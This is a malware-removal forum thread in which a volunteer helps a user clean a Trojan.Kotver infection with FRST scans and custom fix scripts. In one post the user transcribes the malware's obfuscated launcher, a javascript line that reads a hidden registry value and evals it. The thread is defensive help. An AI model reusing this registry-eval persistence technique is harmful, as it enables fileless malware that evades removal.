rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 8, 2016 8:09:17 GMT -8
Good morning,

My PC is infected with Trojan.Kotver!gm2. I'm on Windows 10 on a Dell system running Norton Security Suite. As I'm sure others have said, Norton detects and asks me to restart, but then the process just repeats. Power Eraser did not find it. I have NOT run any other virus/malware software. It "appears" to be finding it in the folder c:\windows\syswow64\, but obviously isn't getting all of it. I have run the First64 file, and linked the files from wikisend below.

I would greatly appreciate your help,
Robert

First.txt Addition.txt
|
|
dbrisen
Malware Removalists
Posts: 3,688
|
Post by dbrisen on Oct 8, 2016 15:15:57 GMT -8
Thanks for the logs; I hope the instructions were clear enough for you.

FIRST >>>>
Please go to START (Windows Orb) >> Control Panel >> Uninstall a Program or Programs and Features and remove the following (if listed):

QuickTime 7

To do so, left click on the name once and then click Uninstall/Change at the bar above the list window. Follow the prompts of the uninstaller BUT please read carefully any questions it asks before answering; some uninstallers will try and deceive you into keeping the software.

SECOND >>>>
Open notepad by pressing the Windows Key + R key, typing notepad in the Run box and pressing Enter. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt

NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Start FRST that is on the desktop by right clicking on file and selecting "Run as Administrator..." and press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run. When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

LAST >>>>
How is your system running now?
|
|
rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 8, 2016 18:37:33 GMT -8
Things seem to be better. Norton is not finding it like it used to. Also the computer CPU isn't spontaneously "running" high usage. I have attached the Fixlog file.

One thing I need to mention, when the PC reboots I get a "Script Error". It says:

Line: 1
Char: 74
Invalid root in registry key "HKCU\software\ybaiafd\cnoid"
Code: 0
URL:
Do you want to continue running scripts on this page?

Then I have to answer Yes or No. Your thoughts?

Fixlog.txt (56.11 KB)
|
|
dbrisen
Malware Removalists
Posts: 3,688
|
Post by dbrisen on Oct 8, 2016 20:38:40 GMT -8
Thanks for letting me know that; it seems the malware has mutated in a new direction .... hmmm

FIRST >>>>
Read Slowly and all of it.

If you still have an Addition.txt log file on your desktop, please delete it now. Start FRST64 that is on your Desktop by double clicking and allowing the software to run when the User Access Control asks (if it does). The tool will start to run. When the tool opens click Yes to disclaimer. (if it does) Select Additional.txt and the Shortcut.txt in the Optional Scans section of FRST64. Press Scan button. It will make three logs (FRST.txt, Addition.txt, and Shortcut.txt) on your Desktop. Please attach the logs in your reply back.

Notes:
If your Security software blocks the running or download of FRST / FRST64, please disable the security software or make an exception for this file. FRST is updated very frequently and is safe to run but because of the frequent changes (to keep up with newest malware techniques) most Security Software does not approve of the unknown file.

Right now the forum will not allow one to attach the Addition.txt file so please use wikisend.com or pastebin.com to upload the file and then post the download link here in your reply post.

SECOND >>>>
Please download Check Browsers LNK from here. Double click on the file and let it run. Attach the log file Check_Browsers_LNK.log in a reply post here.
|
|
rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 9, 2016 6:43:38 GMT -8
|
|
dbrisen
Malware Removalists
Posts: 3,688
|
Post by dbrisen on Oct 9, 2016 15:30:49 GMT -8
Quick question:
Do you still get the script error message when booting? Does it show what browser / parent window this comes from? Perhaps in the windows title bar?
|
|
dbrisen
Malware Removalists
Posts: 3,688
|
Post by dbrisen on Oct 9, 2016 16:02:10 GMT -8
Open notepad by pressing the Windows Key + R key, typing notepad in the Run box and pressing Enter. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt

NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Start FRST that is on the desktop by right clicking on file and selecting "Run as Administrator..." and press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run. When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

How is your system running now?
|
|
rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 9, 2016 16:10:34 GMT -8
I just rebooted and got the same message. There is a title bar, but I can't highlight it to copy. I've been trying to find a way to upload a screenshot for you but wikisend won't let me upload a jpeg or pdf. So I'm going to try to reproduce it, but it's long.
javascript:SO0YdY9W="SwKgOO";hU30=newActiveXObject("WScript.Shell");yP3P5g="8OPVn";dGQ2q=hU30.RegRead("HKCU\\software\\ybaiafd\\cnoid");yufE7="jiD3SOwL";eval(dGQ2q);W1LL4ctS="SgXy45P";
|
|
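The title-bar string transcribed in the post above creates a WScript.Shell object, reads a registry value, and passes it to eval(). The following detection sketch is an added example, not code from the thread or from FRST; it flags startup command strings with that data flow and reports which registry value they execute. The function names and the non-thread sample entries are assumptions, and the thread does not say where the string is stored.

```python
import re

# Launcher text as transcribed in the post above, including the missing
# space in "newActiveXObject" (the regex below tolerates it).
PAGE_SAMPLE = (
    'javascript:SO0YdY9W="SwKgOO";hU30=newActiveXObject("WScript.Shell");'
    'yP3P5g="8OPVn";dGQ2q=hU30.RegRead("HKCU\\\\software\\\\ybaiafd\\\\cnoid");'
    'yufE7="jiD3SOwL";eval(dGQ2q);W1LL4ctS="SgXy45P";'
)

# Constructed inventory of startup command strings (labels are made up).
AUTORUNS = {
    "entry from the thread": PAGE_SAMPLE,
    "constructed: ordinary updater":
        r'"C:\Program Files\Vendor\updater.exe" /background',
    "constructed: reads a value but never evals it":
        'javascript:s=new ActiveXObject("WScript.Shell");'
        'v=s.RegRead("HKCU\\\\Software\\\\Example\\\\Theme");close();',
}

SHELL_RE = re.compile(
    r'(\w+)\s*=\s*new\s*ActiveXObject\(\s*["\']WScript\.Shell["\']\s*\)', re.I)
READ_RE = re.compile(
    r'(\w+)\s*=\s*(\w+)\.RegRead\(\s*["\']([^"\']+)["\']\s*\)', re.I)
EVAL_RE = re.compile(r'\beval\(\s*(\w+)\s*\)', re.I)


def find_registry_eval_launcher(command):
    """Return registry value paths whose contents the command would eval()."""
    if "javascript:" not in command.lower():
        return []
    # Variables holding a WScript.Shell object; junk assignments are ignored.
    shells = {m.group(1) for m in SHELL_RE.finditer(command)}
    # Variables assigned from <shell>.RegRead("path"), mapped to that path.
    reads = {m.group(1): m.group(3)
             for m in READ_RE.finditer(command) if m.group(2) in shells}
    hits = []
    for m in EVAL_RE.finditer(command):
        path = reads.get(m.group(1))
        if path:
            hits.append(path.replace("\\\\", "\\"))  # undo JS escaping
    return hits


def scan(entries):
    """Map entry label -> registry paths, for suspicious entries only."""
    return {name: paths for name, cmd in entries.items()
            if (paths := find_registry_eval_launcher(cmd))}


if __name__ == "__main__":
    print(scan(AUTORUNS))
```

The path it reports for the thread's entry is the same key named in the "Invalid root in registry key" script error from the earlier post.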
rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 9, 2016 16:12:05 GMT -8
Wait, I sent that last reply before I saw your most recent. So I have not tried that yet.
I'll do that now.
|
|
rap93
New Helpee
Posts: 9
|
Post by rap93 on Oct 9, 2016 17:04:57 GMT -8
I ran your fix and everything seems to be running great now. I did NOT get the script error upon reboot. Here is the fixlog: Fixlog.txt (5.64 KB)
|
|